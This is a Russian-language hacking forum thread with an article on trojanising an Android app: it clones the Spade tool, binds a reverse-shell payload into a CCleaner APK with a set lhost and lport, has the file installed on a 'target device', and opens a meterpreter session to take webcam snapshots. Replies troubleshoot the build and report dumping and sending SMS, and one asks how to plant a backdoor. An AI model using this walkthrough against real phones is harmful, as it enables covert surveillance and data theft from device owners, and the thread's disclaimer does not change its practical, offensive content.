• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Взлом Android-устройства

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.git
upload_2016-10-17_20-20-41.png


После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

upload_2016-10-17_20-21-32.png


upload_2016-10-17_20-21-40.png


Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

upload_2016-10-17_20-22-6.png


Видим привилегии, которые нам доступны:

upload_2016-10-17_20-22-32.png


Готовый файл сохраняется в директории /root/spade

upload_2016-10-17_20-22-51.png


На запрос этой настройки отвечаем утвердительно:

upload_2016-10-17_20-23-18.png


Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

upload_2016-10-17_20-23-36.png


Попробуем осмотреться в системе:

upload_2016-10-17_20-23-55.png


Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snap
upload_2016-10-17_20-24-23.png


И эта команда срабатывает успешно:

upload_2016-10-17_20-24-45.png


На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -
 
Последнее редактирование:
D

dimm666

А в payload.java указан ip адрес VPN ? И VPN имеет ли доступ к своему айпи из вне?
Доступ есть, но я, наверное, не учёл, что нужно указать открытый порт. Спасибо за пинок в нужном направлении.
P.S. возможно, глупый вопрос, но всё же - а можно ли указывать IP v6 ?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Доступ есть, но я, наверное, не учёл, что нужно указать открытый порт. Спасибо за пинок в нужном направлении.
P.S. возможно, глупый вопрос, но всё же - а можно ли указывать IP v6 ?
Пока не готов ответить,как то мало практики с работой по IPv6 (
 
H

hanoi

Проблему решил ту, возникла следующая - не создается файл -final, то есть в консоли пишется, мол создан ....-final.apk
но в папке спейда пусто
Привет! решили проблему с ....-final.apk? у меня такая же проблемаo_O
 
H

hanoi

Снимок экрана от 2016-12-17 18-14-08.png
вот такая проблемка,не создаётся ....-final.apk Люди добрые помогите:)
 

Вложения

  • Снимок экрана от 2016-12-17 18-14-43.png
    Снимок экрана от 2016-12-17 18-14-43.png
    84,6 КБ · Просмотры: 511
  • Снимок экрана от 2016-12-17 18-16-13.png
    Снимок экрана от 2016-12-17 18-16-13.png
    27,8 КБ · Просмотры: 276
  • Снимок экрана от 2016-12-17 18-16-47.png
    Снимок экрана от 2016-12-17 18-16-47.png
    31,7 КБ · Просмотры: 471
  • Снимок экрана от 2016-12-17 18-17-34.png
    Снимок экрана от 2016-12-17 18-17-34.png
    47,5 КБ · Просмотры: 522
  • Снимок экрана от 2016-12-17 18-19-08.png
    Снимок экрана от 2016-12-17 18-19-08.png
    32,3 КБ · Просмотры: 431
  • Снимок экрана от 2016-12-17 18-21-33.png
    Снимок экрана от 2016-12-17 18-21-33.png
    18,4 КБ · Просмотры: 441
E

Epanalit

Подскажите как открыть backdoor на андроид если есть сессия meterpreter
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Загрузить и активировать за ранее созданный файл с полезной нагрузкой. Можно использовать различные фреймворки для создания. Команды можно посмотреть набрав help - там увидите.
 
  • Нравится
Реакции: Vander
S

slepoihudoznik

Все получилось , дамп sms получить удалось лишь при создании 3 ей сессии , отправить смог лишь одну смс потом ошибку выдавало ... у кого проблемы с финалом апк ... файл например opera.apk кидаете в папку спаде , далее cd /root/spade/ , потом уже ./spade.py opera.apk через vpn и прочей .. сначало с андройда раздайте wifi в режиме модема и потренеруйтесь
 
M

Masua42RU

Все получилось , дамп sms получить удалось лишь при создании 3 ей сессии , отправить смог лишь одну смс потом ошибку выдавало ... у кого проблемы с финалом апк ... файл например opera.apk кидаете в папку спаде , далее cd /root/spade/ , потом уже ./spade.py opera.apk через vpn и прочей .. сначало с андройда раздайте wifi в режиме модема и потренеруйтесь
Спасибо! Помог, а то Я чего то затупил.
 
S

seregokross3

Открываю на мобиле приложение, оно вылетает, сессия не открывается....
В чем может быть проблема?
 
Ю

ЮляСаша

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
***Скрытый текст***
Посмотреть вложение 7174

После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

Посмотреть вложение 7175

Посмотреть вложение 7176

Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

Посмотреть вложение 7177

Видим привилегии, которые нам доступны:

Посмотреть вложение 7178

Готовый файл сохраняется в директории /root/spade

Посмотреть вложение 7179

На запрос этой настройки отвечаем утвердительно:

Посмотреть вложение 7180

Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

Посмотреть вложение 7181

Попробуем осмотреться в системе:

Посмотреть вложение 7182

Все работает, теперь можно испытать работу, к примеру, камеры:
***Скрытый текст***
Посмотреть вложение 7183

И эта команда срабатывает успешно:

Посмотреть вложение 7184

На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -
Хорошая тема
[doublepost=1488732598,1488732405][/doublepost]Какое решение этой проблемы?
 
S

slepoihudoznik

Попробуй перед тем как совать apk файл укоротить его имя до opera.apk например , с длинными именами апк у меня тоже глюки такого рода были .
[doublepost=1489571460,1489571365][/doublepost]С
Попробуй перед тем как совать apk файл укоротить его имя до opera.apk например , с длинными именами апк у меня тоже глюки такого рода были .
Совать скрипту ...
 

aveseth

Green Team
04.12.2016
22
1
BIT
1
На 7-ом ведроиде эксплоит не срабатывает,сессия появляется,но через 4-5 секунд закрывается)
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
На 7-ом ведроиде эксплоит не срабатывает,сессия появляется,но через 4-5 секунд закрывается)

Проблема может быть в приложение, в которое нагрузку вшили. Стоит потратить время на подбор рабочего случая.
 
F

freruneer

Оно не всегда работает , не на всех андроидах устанавливается .. и на некоторых когда делаешь запрос какой то то на телефоне выскакивает подтверждения этого действия
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!